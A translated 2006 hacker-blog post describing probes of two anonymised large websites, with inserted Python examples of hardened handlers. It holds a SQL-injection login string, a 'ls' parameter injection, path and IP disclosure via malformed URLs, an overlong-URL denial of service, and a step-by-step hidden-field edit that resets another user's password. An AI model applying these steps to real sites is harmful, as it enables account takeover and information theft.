Hacking tips-domestic famous website vulnerability-vulnerability warning-the black bar safety net

2006-02-17 00:00:00
Anonymous (佚名)
www.myhack58.com

Recently, system vulnerabilities have held little interest: patches come out very quickly now, and the large sites have no system-level holes left. Even with very strong scanners such as twwwscan or nmap you cannot scan up anything, and scanners are easily fooled anyway. But, as the saying goes, every fortress has a gap. The bigger the website, the more scripts it needs, and scripts are only as good as the ability of whoever writes them; where that ability falls short, security has problems. With free scripts the problems are many, and if the source code is easy to obtain, getting in is far too easy.

Strongly recommended: do not use free scripts. Note also that modifying them still leaves security problems.

Web scripts fall roughly into html, asp, cgi, php, jsp, xml, pl, etc. CGI has the most issues, since it is a relatively early kind of script program, so it has also been studied the most. HTML is the safest, because it has the fewest features and the fewest scripts.

Recently, for certain reasons, I tested a few of the large sites' domains a bit and found a few script problems (now fixed).

<http://bbs.xxxxxx.com/cgi-bin/user_interface?Pgroup_id=10322>
Modify it to
<http://bbs.xxxxxx.com/cgi-bin/user_interface?Pgroup_id=>***
and the absolute path is exposed (probably left in to make debugging easier; a lot of sites have this problem):
Fail To Load the HTML Template File: Fail To Open Template File:/usr/local/oiweb/htdocs/club/community/***.htm

Next:
http://bbs.xxxxxx.com/cgi-bin/us … ///////////////////
///////
Trying a long file name ^^, ha... it exposes an internal IP:
Fail To Load the HTML Template File: Fail To Open Template File:/usr/local/oiweb/htdocs/club/community////////////////////////////////////////////////////192.168.10.30.htm

Again:
<http://bbs.xxxxxx.com/cgi-bin/user_interface?Pgroup_id=>'ls'
This produces an SQL processing error. Unfortunately I did not go on to test how it could be used.

Last:
http://bbs.xxxxxxx.com/cgi-bin/u … ///////////////////
/////////////////////////////////////////////////////////////////////////////
An ultra-long file name (Apache very easily goes wrong on long file-name URLs):
Internal Server Error
The server encountered an internal error or misconfiguration and was unable to complete your request. Please contact the server administrator, [email protected] and inform them of the time the error occurred, and anything you might have done that may have caused the error. More information about this error may be available in the server error log.
--------------------------------------------------------------------------------
Apache/1.3.12 Server at bbs.xxxxxx.com Port 80

Denial of service! Probably only xxx.xxx.xx.xx went wrong. After the denial of service, the tests above all failed; other services were normal. (At the time I also thought: did they patch it immediately? ^^)
This vulnerability is of no use; it just shows that even a large website has bugs, hehe ^_^
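The three failures above (the absolute path in the error text, the internal IP in the template name, the crash on an overlong name) all come from passing Pgroup_id straight into a template path and echoing the failure back to the browser. The following is an added example, not the site's CGI code: a Python stand-in for the user_interface handler that accepts only a short numeric id, maps it to a template file under a fixed directory, and returns the same generic message for every failure while the detail goes to the server log. The template root, the 10-character limit and the handler's (status, body) shape are assumptions.

```python
import logging
import os
import re
from pathlib import Path

log = logging.getLogger("user_interface")

# Assumed template root; the page's error text shows
# /usr/local/oiweb/htdocs/club/community, reused here as a constructed stand-in.
TEMPLATE_ROOT = Path("/usr/local/oiweb/htdocs/club/community")
MAX_ID_LEN = 10  # assumption: group ids are short decimal numbers
ID_RE = re.compile(r"[0-9]{1,%d}" % MAX_ID_LEN)
GENERIC_ERROR = "The requested page is not available."


def resolve_template(group_id, root=TEMPLATE_ROOT):
    """Map Pgroup_id to a template file under root, or None if the value is unacceptable.

    Empty values, quotes, slashes, overlong strings and anything else that is
    not a short run of digits are rejected, so the parameter can never name a path.
    """
    if not isinstance(group_id, str) or ID_RE.fullmatch(group_id) is None:
        return None
    root = Path(os.path.normpath(str(root)))
    candidate = Path(os.path.normpath(str(root / f"{group_id}.htm")))
    # Belt and braces: the normalised file must sit directly inside root.
    if candidate.parent != root:
        return None
    return candidate


def handle_request(params, root=TEMPLATE_ROOT):
    """Return (status, body) for one request.

    Every failure yields the same generic body; file names, directories and the
    underlying OS error are written to the server log only, never to the client.
    """
    raw = params.get("Pgroup_id")
    template = resolve_template(raw, root)
    if template is None:
        log.warning("rejected Pgroup_id=%r", raw)
        return 404, GENERIC_ERROR
    try:
        return 200, template.read_text()
    except OSError as exc:
        log.error("template load failed for %s: %s", template, exc)
        return 404, GENERIC_ERROR


if __name__ == "__main__":
    # Constructed inputs mirroring the page's probes: a normal id, an empty id,
    # a quoted command, a slash-padded name and an overlong name.
    for value in ("10322", "", "'ls'", "/" * 40 + "192.168.10.30", "1" * 4000):
        print(repr(value[:30]), "->", resolve_template(value))
```

The whitelist on the parameter does the real work; the parent-directory check and the generic error body are there so that a future change to the id format cannot quietly reopen path disclosure.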
Later on, another large site to test!

<http://training.yyyyyy.com/>
Tested a couple of authentication vulnerabilities, including 1' or passwd <> '1
Didn't succeed :) Later I registered redh and logged in. :)
Looks like nothing...
Then I chose Modify [modify personal information].
One look, and the problem was found :)
It turned out to modify the password directly, and there is a user cookie.
OK, since it's found, of course the next step is to operate :)
View source -> search -> post
<form method="post" name=form1 id=form1 action="Myschool/StudentUpdate1.asp">
Find this line, the action, and change it to
<form method="post" name=form1 id=form1 action="http://training.yyyyyy.com/Myschool/StudentUpdate1.asp">
Then find the username:
<tr><td width="16%" class=bt align=right>* user name:</td>
<td width="32%" class=nr align=left>redh</td> // the username :)
Change it to sp (the username you want to change).
Then save as a.htm.
After running it, set the password to 123 (whatever you like).
Post it... well, it jumps to the home page... no success...
Then I looked at the source again...
and saw this:
<input type=hidden name=Customer value="redh">
:) So the original cookie drives this...
OK, modified a bit...
<input type=hidden name=Customer value="sp">
Re-post, ha... success...
Log in as sp with 123 ^_^ and get in. Look at the information in Modify; the modified time is written there too.
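What made the second post succeed is that StudentUpdate1.asp took the account to modify from the hidden Customer field, which the client fully controls. The following is an added example, not the site's ASP code, of the server-side pattern that closes this: the acting account comes only from a server-side session keyed by an opaque cookie token, a Customer value that disagrees with the session is refused, and changing the password requires the current one. The in-memory AccountStore and SessionStore, the PBKDF2 hashing and the old_password field are assumptions standing in for the site's database and cookie handling.

```python
import hashlib
import hmac
import os
import secrets

PBKDF2_ROUNDS = 100_000  # assumption; any modern password hash would do


def _hash(password, salt=None):
    salt = salt or os.urandom(16)
    return salt, hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ROUNDS)


def _check(password, salt, digest):
    probe = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ROUNDS)
    return hmac.compare_digest(probe, digest)


class AccountStore:
    """Constructed in-memory stand-in for the site's user table."""

    def __init__(self):
        self.accounts = {}

    def create(self, username, password):
        self.accounts[username] = _hash(password)

    def verify(self, username, password):
        rec = self.accounts.get(username)
        return rec is not None and _check(password, *rec)

    def set_password(self, username, password):
        self.accounts[username] = _hash(password)


class SessionStore:
    """Server-side sessions: the cookie carries an opaque token, the username lives here."""

    def __init__(self):
        self.sessions = {}

    def login(self, store, username, password):
        if not store.verify(username, password):
            return None
        token = secrets.token_urlsafe(32)
        self.sessions[token] = username
        return token

    def user_for(self, token):
        return self.sessions.get(token)


def student_update(store, sessions, cookie_token, form):
    """Hardened counterpart of StudentUpdate1.asp: returns (status, message).

    The account being modified is the session's account and nothing else;
    the hidden Customer field is checked only to detect a cross-account attempt.
    """
    user = sessions.user_for(cookie_token)
    if user is None:
        return 401, "login required"
    if form.get("Customer") not in (None, user):
        return 403, "forbidden"  # client-side field disagrees with the session
    if not store.verify(user, form.get("old_password", "")):
        return 403, "current password incorrect"
    new = form.get("new_password", "")
    if len(new) < 8:
        return 400, "password too short"
    store.set_password(user, new)
    return 200, "updated"


if __name__ == "__main__":
    # Constructed accounts replaying the page's scenario: redh tries to set sp's password.
    store, sessions = AccountStore(), SessionStore()
    store.create("redh", "redh-pass-1")
    store.create("sp", "sp-pass-1")
    token = sessions.login(store, "redh", "redh-pass-1")
    print(student_update(store, sessions, token,
                         {"Customer": "sp", "old_password": "redh-pass-1", "new_password": "12345678"}))
```

Logging the 403 with the session user and the mismatched Customer value gives a clean detection signal for exactly the edit described above.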
---------------------------------------------

By the way: a large website, as long as it uses a large number of scripts, will certainly have some problem. It may come from negligence, or from a lack of writing skill. As long as you look patiently, it will be found. Of course, you must also be familiar with the language; you cannot know nothing about CGI and still expect to find a problem in it. To the site I would like to say:
1. Use less free stuff; cheap goods are no good.
2. Pay attention to security. Small negligence may cause big security issues (the devil is in the details).